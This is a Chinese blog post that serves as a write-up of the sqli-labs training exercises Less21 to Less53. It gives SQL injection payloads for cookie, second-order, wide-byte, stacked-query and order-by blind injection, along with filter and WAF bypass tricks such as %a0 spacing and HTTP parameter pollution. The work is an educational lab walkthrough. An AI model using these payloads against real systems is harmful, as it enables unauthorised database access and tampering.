<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>sqlilab做题总结（二） | su29029的博客</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="sqlilab是个值得反复做的东西，每次做都会有不同的思考。继续昨天的内容，今天的任务是Less21-Less53。">
<meta property="og:type" content="article">
<meta property="og:title" content="sqlilab做题总结（二）">
<meta property="og:url" content="https://su29029.github.io/2020/08/28/sqlilab%E5%81%9A%E9%A2%98%E6%80%BB%E7%BB%93%EF%BC%88%E4%BA%8C%EF%BC%89/index.html">
<meta property="og:site_name" content="su29029的博客">
<meta property="og:description" content="sqlilab是个值得反复做的东西，每次做都会有不同的思考。继续昨天的内容，今天的任务是Less21-Less53。">
<meta property="og:locale">
<meta property="article:published_time" content="2020-08-28T02:43:30.000Z">
<meta property="article:modified_time" content="2020-08-28T05:43:28.712Z">
<meta property="article:author" content="su29029">
<meta property="article:tag" content="web安全">
<meta name="twitter:card" content="summary">
  
    <link rel="alternate" href="/atom.xml" title="su29029的博客" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 5.1.1"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">su29029的博客</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="https://su29029.github.io"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-sqlilab做题总结（二）" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2020/08/28/sqlilab%E5%81%9A%E9%A2%98%E6%80%BB%E7%BB%93%EF%BC%88%E4%BA%8C%EF%BC%89/" class="article-date">
  <time datetime="2020-08-28T02:43:30.000Z" itemprop="datePublished">2020-08-28</time>
</a>
    
  <div class="article-category">
    <a class="article-category-link" href="/categories/web/">web</a>►<a class="article-category-link" href="/categories/web/web%E5%AE%89%E5%85%A8/">web安全</a>
  </div>

  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      sqlilab做题总结（二）
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <p>sqlilab是个值得反复做的东西，每次做都会有不同的思考。继续昨天的内容，今天的任务是Less21-Less53。</p>
<a id="more"></a>
<h5 id="Less21-22"><a href="#Less21-22" class="headerlink" title="Less21-22"></a>Less21-22</h5><p>这两个题的提示是cookie注入，Less21的闭合方式是单引号加括号，Less22的闭合方式是双引号。全部采用联合查询注入即可。</p>
<h5 id="Less23"><a href="#Less23" class="headerlink" title="Less23"></a>Less23</h5><p>Less23中注释无法使用，发现闭合方式是单引号，故可借助最后多出来的单引号在联合查询的最后一位进行闭合，payload如下：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=0&#x27; union <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="string">&#x27;3  # 最后一个&#x27;</span><span class="number">3</span>将结合原先<span class="keyword">sql</span>语句中存在的单引号，实现闭合。</span><br></pre></td></tr></table></figure>

<p>随后就是联合查询注入，不再赘述。</p>
<h5 id="Less24"><a href="#Less24" class="headerlink" title="Less24"></a>Less24</h5><p>Less24是二次注入。这个题首先观察页面，发现有登录，注册页面。随意注册一个账号登录上去后发现有个登录后显示信息的页面，可以修改密码，可以退出登录。题目提示二次注入，考虑修改密码的逻辑，猜测修改密码的地方没有进行转义，尝试注册<code>admin&#39; --</code>的用户，登录上去后修改密码，随后退出，使用admin用户名登录，密码为刚刚修改的密码，发现成功登录。</p>
<p>进行白盒测试，审计代码，发现登录后修改密码的逻辑中存在漏洞，获取的用户名是从session中获取的，且没有进行转义，这时如果注册了一个包含注入代码的username，这里获取到的username就会改变update语句的结构，造成二次注入。</p>
<h5 id="Less25-Less25a"><a href="#Less25-Less25a" class="headerlink" title="Less25/Less25a"></a>Less25/Less25a</h5><p>这两个题过滤了and和or，and可以通过&amp;&amp;绕过，or可以通过||绕过，其他的就正常操作即可。注意闭合方式。</p>
<h5 id="Less26-26a"><a href="#Less26-26a" class="headerlink" title="Less26/26a"></a>Less26/26a</h5><p>这两个题过滤空格和注释，注释可以通过巧妙闭合单引号来避免掉注释的使用，空格的绕过方法有以下几种，可以逐一尝试：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">1.&#x2F;**&#x2F;绕过，&#x2F;**&#x2F;相当于空格</span><br><span class="line">2.%a0绕过，url编码时这个被正则表达式识别为中文字符，不会过滤，而mysql不能识别，不能识别的字符会变成一个空格。</span><br><span class="line">3.巧用小括号(特定情况下)</span><br></pre></td></tr></table></figure>

<p>这里通过%0a绕过即可。</p>
<h5 id="Less27-27a-28-28a"><a href="#Less27-27a-28-28a" class="headerlink" title="Less27/27a/28/28a"></a>Less27/27a/28/28a</h5><p>这四个题过滤了union select.通过试验发现，可以通过任意位大小写，双写等方法绕过。其中Less27a整体过滤了union select这个词组，这里通过%a0(union%a0select)即可绕过。(对于注释和空格的过滤可继续使用上面提到的方法绕过)。</p>
<p>给一个这四个题全部绕过的payload(只需考虑不同的引号/括号闭合方式，以28a为例)：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=0&#x27;)%a0unIOn%a0SElEct%a01,2,(&#x27;3</span><br></pre></td></tr></table></figure>

<p>(关于绕过的问题可参见<a target="_blank" rel="noopener" href="https://github.com/su29029/su29029.github.io/blob/master/_posts/2020-7-8-sql%E6%B3%A8%E5%85%A5%E8%BF%87%E6%BB%A4%E9%97%AE%E9%A2%98.md">sql注入过滤问题</a>)</p>
<h5 id="Less29-30-31"><a href="#Less29-30-31" class="headerlink" title="Less29/30/31"></a>Less29/30/31</h5><p>这两个题提示WAF，但是自己做测试的时候并没有发现在哪里过滤什么东西了…直接联合查询好像没啥问题。后来看了别人的wp，发现了这里的特殊点：根据不同的Web服务器和应用服务器特性，在遇到相同参数时，读取的参数是不一样的(但是对这个题貌似没用诶….)</p>
<p>具体，例如<code>index.php?id=1&amp;id=2</code>,如果是apache(php)服务器，将解析最后一个id参数，如果是tomcat(jsp)服务器，则解析第一个参数，Apache(Perl(CGI))解析第一个参数，Apache(python)全部获取，返回list。</p>
<p>这里有个问题，如果传入index.jsp?id=1&amp;id=2,那么最终返回客户端的是哪个参数呢？答案是最后一个参数，因为最终为客户端提供服务的是web服务器，也就是Apache,Apache解析最后一个参数，故返回的是id=2。</p>
<p>这里的一个启发是，在实际的Web应用中，经常会遇到两层服务器的情况，而我们往往是在tomcat应用服务器层进行过滤，功能类似WAF。</p>
<p>而正因为解析参数的不同，我们此处可以利用该原理绕过 WAF 的检测。如 payload：index.jsp?id=1&amp;id=0 or 1=1–+，tomcat 只检查第一个参数id=1，而对第二个参数id=0 or 1=1–+不做检查，直接传给了 apache，apache 恰好解析第二个参数，便达到了攻击的目的。</p>
<p>(这个操作的专业叫法是：HTTP参数污染攻击)</p>
<h5 id="Less32-33"><a href="#Less32-33" class="headerlink" title="Less32/33"></a>Less32/33</h5><p>这两个题是get型宽字节注入。宽字节注入的原理是url编码将一个精心构造好的url编码字符传入，由于后台mysql设置GBK编码，php为GBK编码，函数执行的是添加ascii码，假如我们传入<code>%df&#39;</code>,最终传入mysql的是%df%5c%27,其中%df%5c会被识别成一个宽字节，这时原本添加的\转义就被吃掉了，从而实现了注入的目的。</p>
<p>本题payload：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=0%df&#x27; union <span class="keyword">select</span> <span class="number">1</span>,<span class="keyword">database</span>(),<span class="number">3</span> %<span class="number">23</span></span><br></pre></td></tr></table></figure>

<h5 id="Less34"><a href="#Less34" class="headerlink" title="Less34"></a>Less34</h5><p>post型宽字节注入，将utf8转为utf16即可绕过。payload：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">�&#39; union select 1,database(),3#</span><br></pre></td></tr></table></figure>

<h5 id="Less35"><a href="#Less35" class="headerlink" title="Less35"></a>Less35</h5><p>数字型，escape函数没用，直接注入即可。</p>
<h5 id="Less36"><a href="#Less36" class="headerlink" title="Less36"></a>Less36</h5><p>同Less33,%df宽字节注入。</p>
<h5 id="Less37"><a href="#Less37" class="headerlink" title="Less37"></a>Less37</h5><p>同Less34,注意一下这次只有两列即可。</p>
<h5 id="Less38-41"><a href="#Less38-41" class="headerlink" title="Less38-41"></a>Less38-41</h5><p>堆叠注入。指的是在某些情况下，后端的sql语句执行函数可以执行多条命令(例如mysqli_multi_query())，这个时候我们可以通过;来结束前一条sql语句，随后再在分号后面写入sql，从而实现“堆一堆”sql语句进行注入。而;后的语句理论上没有过滤的话则可以为所欲为。<br>不过堆叠注入利用的条件有限，因为一般情况下后台的sql执行函数为安全起见只允许执行单一sql，分号后的语句将会被忽略。</p>
<p>payload(注意引号闭合方式，此处以Less38为例，注意40和41需提前布尔盲注出表名):</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;;<span class="keyword">insert</span> <span class="keyword">into</span> <span class="keyword">users</span>(<span class="keyword">id</span>,username,<span class="keyword">password</span>) <span class="keyword">values</span> (<span class="number">100</span>,<span class="string">&quot;a&quot;</span>,<span class="string">&quot;b&quot;</span>); %23</span><br></pre></td></tr></table></figure>

<h5 id="Less42-43-44-45"><a href="#Less42-43-44-45" class="headerlink" title="Less42/43/44/45"></a>Less42/43/44/45</h5><p>这几个题均需在passwd处进行堆叠注入。42,43有回显，44,45无回显(需在passwd字段处布尔盲注出表名)。payload:</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;;<span class="keyword">insert</span> <span class="keyword">into</span> <span class="keyword">users</span>(<span class="keyword">id</span>,username,<span class="keyword">password</span>) <span class="keyword">values</span> (<span class="number">100</span>,<span class="string">&quot;a&quot;</span>,<span class="string">&quot;b&quot;</span>); %23</span><br></pre></td></tr></table></figure>

<h5 id="Less46-47-48-49"><a href="#Less46-47-48-49" class="headerlink" title="Less46/47/48/49"></a>Less46/47/48/49</h5><p>order by注入，由于不在where语句位置，故无法使用联合查询注入，这里主要采用报错注入和盲注的方式。payload: </p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Less46:sort=1 and updatexml(1,concat(&#x27;~&#x27;,database()),1) <span class="comment"># 报错注入</span></span><br><span class="line">Less47:sort=1&#x27; and if(ascii(substr(database(),1,1))=115,0,sleep (5)) %23</span><br><span class="line">Less48:sort=1 and if(ascii(substr(database(),1,1))=115,sleep(5),0) %23</span><br><span class="line">Less49:sort=1 and if(ascii(substr(database(),1,1))=115,sleep(5),0) %23</span><br></pre></td></tr></table></figure>

<h5 id="Less50-51-52-53"><a href="#Less50-51-52-53" class="headerlink" title="Less50/51/52/53"></a>Less50/51/52/53</h5><p>order by+堆叠注入。payload如下：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;;<span class="keyword">insert</span> <span class="keyword">into</span> <span class="keyword">users</span>(<span class="keyword">id</span>,username,<span class="keyword">password</span>) <span class="keyword">values</span> (<span class="number">500</span>,<span class="string">&quot;sss&quot;</span>,<span class="string">&quot;dddd&quot;</span>);%23</span><br></pre></td></tr></table></figure>


      
    </div>
    <footer class="article-footer">
      <a data-url="https://su29029.github.io/2020/08/28/sqlilab%E5%81%9A%E9%A2%98%E6%80%BB%E7%BB%93%EF%BC%88%E4%BA%8C%EF%BC%89/" data-id="ckedv7ia8000xxxty4w7ucdg8" class="article-share-link">Share</a>
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/web%E5%AE%89%E5%85%A8/" rel="tag">web安全</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2020/08/28/sqlilab%E5%81%9A%E9%A2%98%E6%80%BB%E7%BB%93%EF%BC%88%E4%B8%89%EF%BC%89/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          sqlilab做题总结（三）
        
      </div>
    </a>
  
  
    <a href="/2020/08/28/sqlilab%E5%81%9A%E9%A2%98%E6%80%BB%E7%BB%93%EF%BC%88%E4%B8%80%EF%BC%89/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">sqlilab做题总结（一）</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Categories</h3>
    <div class="widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/c%E8%AF%AD%E8%A8%80/">c语言</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/web/">web</a><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/web/web%E5%AE%89%E5%85%A8/">web安全</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/web/web%E5%BC%80%E5%8F%91/">web开发</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/web/%E7%BD%91%E7%BB%9C%E7%BC%96%E7%A8%8B/">网络编程</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/web/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/">计算机网络</a></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/web%E5%AE%89%E5%85%A8/">web安全</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/windows%E7%BC%96%E7%A8%8B/">windows编程</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E7%AE%97%E6%B3%95/">算法</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E8%BD%AF%E4%BB%B6%E5%B7%A5%E7%A8%8B/">软件工程</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/c%E8%AF%AD%E8%A8%80/" rel="tag">c语言</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/web%E5%AE%89%E5%85%A8/" rel="tag">web安全</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/web%E5%BC%80%E5%8F%91/" rel="tag">web开发</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/windows%E7%BC%96%E7%A8%8B/" rel="tag">windows编程</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%AE%97%E6%B3%95/" rel="tag">算法</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%BD%91%E7%BB%9C%E7%BC%96%E7%A8%8B/" rel="tag">网络编程</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/" rel="tag">计算机网络</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E8%BD%AF%E4%BB%B6%E5%B7%A5%E7%A8%8B/" rel="tag">软件工程</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/c%E8%AF%AD%E8%A8%80/" style="font-size: 10px;">c语言</a> <a href="/tags/web%E5%AE%89%E5%85%A8/" style="font-size: 20px;">web安全</a> <a href="/tags/web%E5%BC%80%E5%8F%91/" style="font-size: 15px;">web开发</a> <a href="/tags/windows%E7%BC%96%E7%A8%8B/" style="font-size: 10px;">windows编程</a> <a href="/tags/%E7%AE%97%E6%B3%95/" style="font-size: 10px;">算法</a> <a href="/tags/%E7%BD%91%E7%BB%9C%E7%BC%96%E7%A8%8B/" style="font-size: 10px;">网络编程</a> <a href="/tags/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/" style="font-size: 10px;">计算机网络</a> <a href="/tags/%E8%BD%AF%E4%BB%B6%E5%B7%A5%E7%A8%8B/" style="font-size: 10px;">软件工程</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/08/">August 2020</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2020/08/28/%E6%B4%9B%E8%B0%B7%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95-1-1-2-3%E7%BB%84/">洛谷刷题记录(1)(1,2,3组)</a>
          </li>
        
          <li>
            <a href="/2020/08/28/ctfshow%E8%90%8C%E6%96%B0%E8%AE%A1%E5%88%92%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/">ctfshow萌新计划刷题记录</a>
          </li>
        
          <li>
            <a href="/2020/08/28/buu%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%951/">buu刷题记录1</a>
          </li>
        
          <li>
            <a href="/2020/08/28/csrf-ssrf-session%E4%BC%AA%E9%80%A0/">csrf&amp;ssrf&amp;session伪造</a>
          </li>
        
          <li>
            <a href="/2020/08/28/xxe%E9%97%AE%E9%A2%98/">xxe问题</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2020 su29029<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/script.js"></script>




  </div>
</body>
</html>